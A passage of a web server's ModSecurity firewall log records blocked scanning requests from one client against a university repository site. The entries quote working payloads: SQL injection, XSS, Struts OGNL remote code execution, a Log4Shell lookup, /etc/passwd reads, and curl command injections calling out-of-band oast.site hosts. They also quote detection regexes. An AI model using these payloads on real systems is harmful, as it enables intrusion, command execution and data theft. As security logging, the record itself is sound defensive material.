"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARtAAEAAAAV"]
[Tue Aug 29 11:33:40.424043 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARtAAYAAAAV"]
[Tue Aug 29 11:33:40.442638 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARA7iwAAAAA"]
[Tue Aug 29 11:33:41.299935 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAAQKOn8AAAAs"]
[Tue Aug 29 11:33:41.441237 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAASAHccAAAAH"]
[Tue Aug 29 11:33:42.299528 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAASBXSUAAAAM"]
[Tue Aug 29 11:33:43.329620 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARjjQIAAAAL"]
[Tue Aug 29 11:33:45.463035 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASDb5sAAAAA"]
[Tue Aug 29 11:33:47.327966 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgc73f9s3jeabxz.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARo83IAAAAT"]
[Tue Aug 29 11:33:47.347610 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAASAHdMAAAAH"]
[Tue Aug 29 11:33:48.335958 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAAR@KIAAAAAF"]
[Tue Aug 29 11:33:48.394350 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg635a1ka1sik1r.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARy-0UAAAAb"]
[Tue Aug 29 11:33:49.415033 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgdhk7fj7rt5yrz.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARxOsIAAAAa"]
[Tue Aug 29 11:33:49.417471 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repositoryfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARjjSUAAAAL"]
[Tue Aug 29 11:33:50.364871 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlguc1emer1nsf5n.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAAR@KIsAAAAF"]
[Tue Aug 29 11:33:50.390279 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAAQKOpsAAAAs"]
[Tue Aug 29 11:33:51.356000 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAAR@KJAAAAAF"]
[Tue Aug 29 11:33:52.472304 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARQ4DkAAAAB"]
[Tue Aug 29 11:33:52.513748 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repositoryfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4DsAAAAB"]
[Tue Aug 29 11:33:53.318735 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlg6hfin851nkgw7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARdiNYAAAAK"]
[Tue Aug 29 11:33:53.416633 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgmxkde5zbb46hn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAANsAm4AAAAD"]
[Tue Aug 29 11:33:53.417055 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARtADsAAAAV"]
[Tue Aug 29 11:33:54.363172 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAASAHe4AAAAH"]
[Tue Aug 29 11:33:54.425703 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAQKOq0AAAAs"]
[Tue Aug 29 11:33:55.372306 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repositoryfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARdiOIAAAAK"]
